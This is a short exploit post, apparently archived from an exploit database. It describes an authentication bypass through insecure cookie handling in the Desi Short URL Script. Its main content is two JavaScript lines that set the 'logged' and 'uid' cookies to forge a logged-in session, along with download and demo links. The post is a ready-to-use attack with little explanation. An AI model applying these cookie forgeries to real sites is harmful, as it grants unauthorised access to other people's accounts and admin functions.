id: 5347
date: 06/09/2009
title: Desi Short URL Script (Auth Bypass) Insecure Cookie Handling Vuln
author: N@bilX
cves: 

=================================================================
Desi Short URL Script (Auth Bypass) Insecure Cookie Handling Vuln
=================================================================


Desi Short URL  Insecure Cookie Handling Vulnerability
Discovered By:N@bilX
--------------------
download:http://webscripts.softpedia.com/script/Miscellaneous/Desi-Short-Url-Script-42484.html
exploit:
***
javascript:document.cookie = "logged =1";
javascript:document.cookie = "uid = 13";
-----------------
demo:http://www.desiscripts.com/demo/URL/index.php



#  0day.today [2023-03-25]  #